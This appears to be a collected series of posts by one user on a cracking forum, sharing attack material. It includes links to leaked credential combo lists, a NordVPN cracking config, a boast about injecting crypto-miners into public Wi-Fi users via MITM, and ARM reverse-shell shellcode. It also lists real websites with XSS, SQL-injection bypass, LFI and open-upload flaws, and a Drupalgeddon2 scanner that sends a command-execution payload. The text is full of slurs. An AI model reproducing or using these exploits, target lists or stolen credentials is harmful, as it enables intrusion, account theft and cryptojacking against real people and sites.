mesvak

[hide] https://www.upload.ee/files/10040047/29k.txt.html [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils

JUST SOMETHING ABOUT THIS THAT I NEEDA BE CLARIFIED ARE U SURE YOU CAN OPEN PORTS WITH NGROK :??: as far as ik and I used this shit a lot the free version btw not a business one its a local host that would give you a domain and every time will change so. Basically you manage a subdomain but not something to do with ports :??: and the one u talking about that's not about opening ur port that's business version which u will forward your host port not ur system port ur host port to any ports u want and that's for business one, not free version Am I right or .....

hmm nice one its good as well

ok fuck off now im not gonna give u anything XD

Today I was inside a mall where I connected to the free Router having 10+ Users already using that. What i did was that I injected Bitcoin Mining Script to those connected devices by the technique of MITM if you know what am talking about and people were not able to figure out that something is going wrong with their devices. And that's the straightforward, easy, undetectable and legal way to take advantage of HACKED wifi devices to earn money. I don't know it's legal or not, but compare to Credit cards, bank logins hacking over MITM this method looks legal. Now You might be wondering how to do this or how I did that.! The above incident was just an example to explain to you all so that many of you can understand... You can perform this attack with tools like ettercap BUT I used my script which will share it later stay gay assholes XD

[hide] https://www.upload.ee/files/10033592/18K.txt.html [/hide]

NORDVPN CFG • Fixed • Proxyless : No • Capture : Yes • ComboType : E:P [hide] https://www.upload.ee/files/10033587/NordVpn.sccfg.html [/hide]

[hide] #!/usr/bin/perl print "################################################################" print "# pERL port scanner #" print "# MESVAK@CRACKED.TO #" print "###############################################################" use strict; use warnings; use IO::Socket::INET; #Auto-flush. $| = 1; #Get host. my $host = $ARGV[0]; #Parent thread has no parent. my $parent = 0; #We need a place to store child PIDs. my @children = (); #Port scan host. print "Scanning $host...\n"; my $port; FORK: for ($port=1; $port<=65535; $port++) { #Fork. my $oldpid = $$; my $pid = fork; #If fork failed... if (not defined $pid) { #If resource is not available... if ($! =~ /Resource temporarily unavailable/) { #Reap children. &DoReap; #Retry this port. $port --; } else { #Otherwise, show the error. die "Can't fork: $!\n"; } } elsif ($pid == 0) { #This is the child. Save parent. $parent = $oldpid; #Clearup kids table. @children = (); #We don't want this thread to fork any more. last FORK; } else { #This is the parent. Store child pid to wait on it later. push @children, $pid; } } #If this is a child (i.e. it has a parent)... if ($parent) { #Attempt to connect to $host on $port. my $socket; my $success = eval { $socket = IO::Socket::INET->new( PeerAddr => $host, PeerPort => $port, Proto => 'tcp' ) }; #If the port was opened, say it was and close it. if ($success) { print "Port $port: Open\n"; shutdown($socket, 2); } #Exit. exit 0; } else { #If we're not the kid, we're the parent. Do a reap. rape can be done as well XD. &DoReap; } #This sub is the reaper. sub DoReap { while (my $child = shift @children) { waitpid $child, 0; } } [/hide]

[hide] !/bin/sh clear echo -e """ mesvak is here runnnnnnn thats my shadow pleb XD """ echo -e "\tip-tor\033[91m :: \033[0m Install tor and show your ip XD :)" echo -e "\tCode\033[91m :: \033[0mNaategh" echo -e "\tVersion\033[91m :: \033[0m0.4" echo -e "\tEmail\033[91m :: \033[0mmanamtabeshekan@gmail.com" echo "" echo -e """ \033[91m1) \033[0mOnly install tor service \033[91m2) \033[0mInstall tor browser \033[91m3) \033[0mShow my ip \033[91m4) \033[0mExit """ function main() { read -p $'\033[36m > \033[0m' choise case $choise in 1 ) apt update && apt install tor echo -e "\n\033[93mTor service installed successfully :)\033[0m" echo "" read -p $'\033[93mDo you want start tor now?[y/N]' answer case ${answer:0:1} in y|Y ) service tor start;; n|N ) ;; esac main;; 2 ) sudo add-apt-repository ppa:webupd8team/tor-browser apt update && apt install tor && apt install tor-browser echo "\n\033[93mTor browser installed successfully :)\033[0m" echo "" main;; 3 ) echo -e "Your ip is:\033[91m" ip= curl http://icanhazip.com echo -e "\033[0m" main;; 4 ) echo -e "\t \033[91m-----------bye!-----------\033[0m" exit 0;; * ) echo -e "\033[91mWrong command!!! \033[0m" main;; esac } main [/hide]

[hide] /* Title : Linux/ARM - backdoor with {ip:port} with /bin/sh Tested : ARM1176 */ #include #include char *shellcode = "\x01\x60\x8f\xe2\x16\xff\x2f\xe1\x92\x1a\x90\x1a\x17\x27\x01\xdf" "\x02\x20\x41\x1e\x82\x1e\x07\x02\xe7\x3f\x01\xdf\x05\x1c\x01\xac" "\x02\x21\x21\x60\x02\x34\x05\x21\x21\x70\x01\x34\x39\x21\x21\x70" "\x0a\x21\x02\x91\x04\x34\x21\x70\x01\xa9\x10\x22\x02\x37\x01\xdf" "\xdc\x3f\x02\x21\x28\x1c\x01\xdf\x01\x39\xfb\xd5\x49\x1a\x92\x1a" "\x0b\x27\x01\xa0\x01\xdf\xc0\x46\x2f\x62\x69\x6e\x2f\x73\x68"; /* 10.0.0.10:1337 */ int main() { __asm__ ( "eor r0, r0\n\t" "sub r0, #1\n\t" "mov r1, r0\n\t" "mov r2, r0\n\t" "mov r3, r0\n\t" "mov r4, r0\n\t" "mov r5, r0\n\t" "mov r6, r0\n\t" "mov r7, r0\n\t"); printf("Shellcode length: %d\n", strlen(shellcode)); printf("Running shellcode...\n"); (*(void(*)()) shellcode)(); printf("Failed!\n"); return 0; } [/hide]

ITS GUD OF CODING xd WRITTEN IN MIX LANG C++ ,ASSEMBLY WITH SOME HEX [hide] https://pastr.io/view/ytiF6Y [/hide]

[hide] https://pastr.io/view/W6lZrE [/hide]

[hide] https://pastr.io/view/o6cxXN [/hide]

welp i made a new version this is fucking old but still work the new version will share it next year or a year after XDX [hide] [/hide]

welp it has two side by side one is main and other one is the one for finding the memory storage on it Power of perl oooof [hide] first one understandable https://pastr.io/view/9QLkUD 2 one needa bash and memory allocated knowledge https://pastr.io/view/cgcfc8 [/hide]

[hide] [/hide]

[hide] https://pastr.io/view/sqyxnK [/hide] its so simple just for getting to know this kinda stuff nibbers

THERE ARE DIFF WAYS FOR DOING IT SOME SITES WILL GIVE YA TO UPLOAD SHITS AND THEY WILL ANALYSE IT FOR YA WHICH IS KINDA GAY 1- https://www.virustotal.com/ 2- https://www.hybrid-analysis.com/ THESE 2 ARE THE BEST BUT I DONT TRUST ANY OF THESE SO LETS GET TO WORK Pescan : ITS SHITTY SOFTWARE THAT does ANALYSE SOME STRUCTURE LIKE PE MASTIFF : it's ABSOLUTELY INSANE AND GOING IN DETAILS SUGGEST USING IT AT LEAST ONCE xd ExifTool : IF YOU USE KALI OR ANY TYPE OF FUCKING LINUX U MUST BE FAMILIAR WITH THIS SHIT welp what it does IT IS USED FOR ANALYSING DIGITAL IMGS , DIAGNOSING OR other WORDS DETECTING METADATA'S THAT YOU CAN EDIT AND CAN BE DISPLAYED AS WELL https://www.sno.phy.queensu.ca/~phil/exiftool/exiftool-11.28.zip DOWNLOAD THE FILE OR USE THE ONLINE VERSION http://metapicz.com/#landing NOTE: YOU NEEDA HAVE PERL INSTALLED ON UR PC OR LINX AnalyzePESig : FOR FINDING AND ANALYSING THE SIGNATURE OF MALWARE Viper : THE BEST ONE IS HERE IS THE FRAMEWORK FOR BINARY ANALYSES WHICH HAVE INCLUDED ALMOST ALL KNOWN-MALWARE'S AND EXPLOITS https://viper.li/en/latest

[hide] https://pastr.io/view/K2tTV0 [/hide] I TAKE NO RESPONSIBILITY FOR DOING ANYTHING ON THESE SITES

[hide] xSS : http://www.mhdc.org.in/newsDetails.php?ID="> http://dentox.com/wp-content/themes/mTheme-Unus/css/css.php?files="> http://www.fakeehcollege.edu.sa/English/index.php?page=">&action=detail&gallery=dsfnc_cup_2011-2012 assest manager : https://www.yeringmeadows.com.au/innova-assetmanager/assetmanager.php [/hide] I TAKE NO RESPONSIBILITY FOR DOING ANYTHING ON THESE SITES

[hide] MESVAK SQL SCRIPT NAB Page Found:http://www.jpinfoweb.com.br/imobiliaria8/adm/index.php '=' 'or' MESVAK SQL SCRIPT NAB Page Found:https://euthaliaglobal.com/emp_welcome.php ' OR 1 --+ MESVAK SQL SCRIPT NAB Page Found:http://www.aapta-jp.com/emp_welcome.php ' OR 1 --+ MESVAK SQL SCRIPT NAB Page Found:http://www.zgkyedu.com/adminis/index.php '=' 'or' MESVAK SQL SCRIPT NAB Page Found:https://ccrhscholarship.in/rdashboard.php '=' 'or' MESVAK SQL SCRIPT NAB Page Found:https://krispolymers.com/admin/ '=' 'or' MESVAK SQL SCRIPT NAB Page Found:http://www.pouptempo.com/imoveis/adm/index.php '=' 'or' MESVAK SQL SCRIPT NAB Page Found:https://www.house2homeuk.com/admin/index.php '=' 'or' MESVAK SQL SCRIPT NAB Page Found:http://www.officialpubguide.com/admin/index.php '=' 'or' [/hide] I TAKE NO RESPONSIBILITY FOR DOING ANYTHING ON THESE SITES

[hide] bug lfi done PERL.OUT: http://www.optilink.mx/interior/index.php?cdo=../../../../../etc/passwd http://www.cddk.ru/autohtml.php?filename=../../../../../../../etc/passwd [/hide] I TAKE NO RESPONSIBILITY FOR DOING ANYTHING ON THESE SITES

[hide] UPLOADER FOUND : https://www.collectivecopies.com/upload/ http://www.secespol.com/pub/editor/FCKeditor/editor/filemanager/connectors/uploadtest.html https://www.collectivecopies.com/upload/ https://ebeam.mff.uw.edu/code/upload/phUploader.php http://www.dfreload.com/file_host/index.php [/hide] I TAKE NO RESPONSIBILITY FOR DOING ANYTHING ON THESE SITES

WELP THE THING THAT I CAN SAY IT IS THERE ARE INFINITE METHODS AND SCANNERS WRITTEN IN DIFF LANGS HERE I WILL GO AHEAD AND STRAIGHTLY HIT THE POT 1-ACOUNTIX WELP AS ALL OF U MIGHT OR MIGHT NOT NO ABOUT THIS SHIT THIS IS KINDA GOOD SHIT FOR FINDING VULN AND EXPLOITS (XSS, LFI, CRLF, SQL, SHELLS, EXPLOITS,...) 2-PYMAP SCANNER (https://github.com/azizaltuntas/Pymap-Scanner) TAKE A LOOK AT it's NOT BAD 3-WAPITI tbh I had fun with this gay tool and it's perfect, and I can say the privileges are injecting xxe,XSS,crlf,XPath and one HQ shit executing commands ooooof its gud idk whether you can find the new version or something like this now cause used it like one year ago (version 3 ) (Generates vulnerability reports in various formats (HTML, XML, JSON, TXT Can suspend and resume a scan or an attack Can give you colors in the terminal to highlight vulnerabilities Different levels of verbosity Adding a payload can be as easy as adding a line to a text file Support HTTP and HTTPS proxies Authentication via several methods: Basic, Digest, Kerberos or NTLM Ability to restrain the scope of the scan (domain, folder, webpage) Safeguards against scan endless-loops (max number of values for a parameter) Can exclude some URLs of the scan and attacks (e.g.: logout URL) Extract URLs from Flash SWF files Try to extract URLs from javascript (very basic JS interpreter) ) 4-damn fucking freaky vuln finder oooof such a significant one 3 years ago I can say one of the first apps I tried https://github.com/ethicalhack3r/DVWA welp one suggestion don't use it on your devices or whatsoever go on RDP or open it on virtual box, and tbh it's not useful anymore I don't think so 5-https://github.com/almandin/fuxploider fuxploider written on python not bad didn't work too much with this one 6-netsparker this is so good cz its updatable and the new version got cracked ezily, so its good to have a look version I have version 5 .000. something its kinda good but I don't use it tbh 7-sqlmap it's fucked up but for the beginning is good but in the while it would get fucking boring and so shitty af i would rather do it by my hands then trusting this or do it with multiple shits like acuntix and sqlmap and one more 8-https://github.com/zigoo0/webpwn3r begining of my learning to get the py out of shit was with this not only this but yeah it helped me so this is gud and its simple only three files one is gay and other 2 are simple just understand the main one and u will get how to code something like a scanner .... And there are some more like z3nom & zarp ....... but tbh i would suggest you guys to code the scanner by ur own gay hands its not big deal tbh as you can see all of em are just to ez to be coded just lil bit training one code which is rly good to have a look #written by gay hands msv import argparse import ipaddress import itertools import re import requests import sys import time #functions niga def exploit(ip_targets): send_params = {'q':'user/password', 'name[#post_render][]':'passthru', 'name[#markup]':'id', 'name[#type]':'markup'} send_data = {'form_id':'user_pass', '_triggering_element_name':'name'} ipregex = re.compile("(\d{1,3}\.){3}\d{1,3}.*") num_scanned = len(ip_targets) num_vuln = 0 time_start = time.time() for ip_target in ip_targets: result = ipregex.match(ip_target) ip_target = "http://"+ip_target if result is not None: r = None print("{:=<74}".format("")) print("[~] {:<60} [{:^7}]".format(ip_target, "..."), end="", flush=True) if verbose == True: try: r = requests.post(ip_target, data=send_data, params=send_params, timeout=3) except requests.exceptions.Timeout: print("\r[~] {:<60} [{:^7}]".format(ip_target, "ERR")) print("{:>7} ERROR: Server seems to be down (Timeout)".format("--")) continue except requests.exceptions.ConnectionError: print("\r[~] {:<60} [{:^7}]".format(ip_target, "ERR")) print("{:>7} ERROR: Unable to connect to the webserver (Connection Error)".format("--")) continue except requests.exceptions.HTTPError: print("\r[~] {:<60} [{:^7}]".format(ip_target, "ERR")) print("{:>7} ERROR: 4xx/5xx".format("--")) continue except requests.exceptions.InvalidURL: print("\r[~] {:<60} [{:^7}]".format(ip_target, "ERR")) print("{:>7} ERROR: Invalid URL.".format("--")) continue except Exception: print("\r[~] {:<60} [{:^7}]".format(ip_target, "ERR")) print("{:>7} ERROR: Unexpected Error".format("--")) sys.exit() else: print("\r[~] {:<60} [{:^7}]".format(ip_target, "OK")) print("{:>7} OK: Alive".format("--")) else: try: r = requests.post(ip_target, data=send_data, params=send_params, timeout=5) except Exception: print("\r[~] {:<60} [{:^7}]".format(ip_target, "ERR")) continue else: print("\r[~] {:<60} [{:^7}]".format(ip_target, "OK")) #Finding block of data to check server type ffs m = re.search(r'', r.text) if m: if verbose == True: print("{:>7} OK: Server seems to be running Drupal".format("--")) found = m.group(1) send_params2 = {'q':'file/ajax/name/#value/' + found} send_data2 = {'form_build_id':found} r = requests.post(ip_target, data=send_data2, params=send_params2) r.encoding = 'ISO-8859-1' out = r.text.split("[{")[0].strip() if out == "": print("{:>7} Patched (CVE-2018-7600)".format("--")) continue else: print("{:>7} Vulnerable (CVE-2018-7600)".format("--")) num_vuln += 1 else: print("{:>7} Doesnt seem like a Drupal server?".format("--")) continue else: raise ValueError("Invalid IP Address") time_fin = time.time() print("{:=<74}".format("")) print("[+] {} target(s) scanned, {} target(s) vulnerable (CVE-2018-7600)".format(num_scanned, num_vuln)) print("[+] Scan completed in {:.3f} seconds".format(time_fin-time_start)) def process_file(target): hostlist = [] try: file = open(target, "r") for line in file: hostlist.append(line.strip()) exploit(hostlist) except FileNotFoundError: print("[!] Unable to locate file. Check file path.") sys.exit() except ValueError: print("[!] Invalid value in file. Ensure only IPv4 addresses exist!") sys.exit() except Exception as e: print(e) print("[!] Unexpected Error! contact me niba ") sys.exit() def process_multiple(target): hostlist = target.split(",") try: for data in hostlist: data = data.strip() exploit(hostlist) except ValueError: print("[!] Invalid Input. Only IPv4 addresses are accepted.") sys.exit() except Exception: print("[!] Unexpected Error! contact me niba ") sys.exit() def process_range(target): try: hostlist = [] raw_octets = target.split(".") octets = [x.strip().split("-") for x in raw_octets] octet_range = [range(int(x[0]), int(x[1])+1) if len(x) == 2 else x for x in octets] for x in itertools.product(*octet_range): hostlist.append('.'.join(map(str,x)).strip()) exploit(hostlist) except ValueError: print("[!] Invalid Input. Only IPv4 ranges are accepted.") sys.exit() except Exception as e: print(e) print("Unexpected Errror") sys.exit() def process_ip(target): try: exploit([target.strip()]) except ValueError: print("[!] Invalid Input. Only IPv4 & valid CIDR addresses are accepted for IP mode.\n{:>7} Use -h to see other modes.".format("--")) sys.exit() except Exception: print("[!] Unexpected Error contact me niba ") sys.exit() def process_cidr(target): hostlist = [] try: net = ipaddress.ip_network(target.strip(), strict=False) for host in net.hosts(): hostlist.append(str(host)) exploit(hostlist) except ValueError: print("[!] Invalid Input. Only IPv4 & valid CIDR addresses are accepted for IP mode.\n{:>7} Use -h to see other modes.".format("--")) sys.exit() except Exception: print("[!] Unexpected Error contact me niba ") sys.exit() #main here def main(): parser = argparse.ArgumentParser(prog="drupalgeddon2-scan.py", formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50)) try: parser.add_argument("target", help="IP of target site(s)") parser.add_argument('-c', "--cidr", default=False, action="store_true", help="Generate & scan a range given a CIDR address") parser.add_argument('-f', "--file", default=False, action="store_true", help="Retrieve IP Addresses from a file (1 per line)") parser.add_argument('-i', "--ip", default=True, action="store_true", help="Single IP Address (CIDR migrated to a seperate mode)") parser.add_argument('-m', "--multiple", default=False, action="store_true", help="Multiple IP Adddress e.g. 192.168.0.1,192.168.0.2,192.168.0.3") parser.add_argument('-r', "--range", default=False, action="store_true", help="IP Range e.g. 192.168.1-2.0-254 (nmap format)") parser.add_argument('-v', "--verbose", default=False, action="store_true", help="Provide a more verbose display") parser.add_argument("-o", "--http-only", default=False, action="store_true", help="To be implemented (Current state, https not implemented)") parser.add_argument("-s", "--https-only", default=False, action="store_true", help="To be implemented") except Exception: print("[!] Unexpected Error! contact me niba ") sys.exit() try: args, u = parser.parse_known_args() except Exception: print("[!] Invalid arguments!") sys.exit() #renaming variable global verbose verbose = args.verbose #Verbose message print("[~] Starting scan...") #IP range in a CIDR format if args.cidr == True: process_cidr(args.target) #IPs from a file elif args.file == True: process_file(args.target) #Multiple IPs (separated w commas) elif args.multiple == True: process_multiple(args.target) #IP Range (start-end) elif args.range == True: process_range(args.target) #IP Address/CIDR elif args.ip == True: process_ip(args.target) #Unrecognised arguments else: print("[!] Unexpected Outcome! contact me niba ") sys.exit() sys.exit() #ifmain here if __name__ == "__main__": try: main() except KeyboardInterrupt: print ("\n-- Ctrl+C caught. Terminating program.") except Exception as e: print(e) print("[!] Unexpected Error! contact me niba ")

[hide] http://www.pennings.co.uk/uploadfile.asp?action=upload&id=&type=&folder=cv&completedreviweref=&allowmultiple= [/hide]